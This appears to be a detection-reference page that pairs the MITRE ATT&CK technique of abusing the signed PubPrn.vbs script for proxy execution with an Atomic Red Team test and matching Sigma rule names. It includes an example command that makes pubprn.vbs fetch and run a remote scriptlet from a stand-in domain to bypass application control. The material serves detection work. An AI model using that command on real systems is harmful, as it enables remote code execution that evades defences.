Find sigma rule
Attack: Signed Script Proxy Execution: Pubprn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe
. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com
.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
MITRE
Tactic
- defense-evasion
technique
- T1216.001
Test : PubPrn.vbs Signed Script Bypass
OS
- windows
Description:
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
Executor
command_prompt
Sigma Rule
-
create_stream_hash_creation_internet_file.yml (id: 573df571-a223-43bc-846e-3f98da481eca)
-
create_stream_hash_ads_executable.yml (id: b69888d4-380c-45ce-9cf9-d9ce46e67821)
-
proc_creation_win_lolbin_pubprn.yml (id: 1fb76ab8-fa60-4b01-bddd-71e89bf555da)
-
proc_creation_win_wscript_cscript_script_exec.yml (id: 1e33157c-53b1-41ad-bbcc-780b80b58288)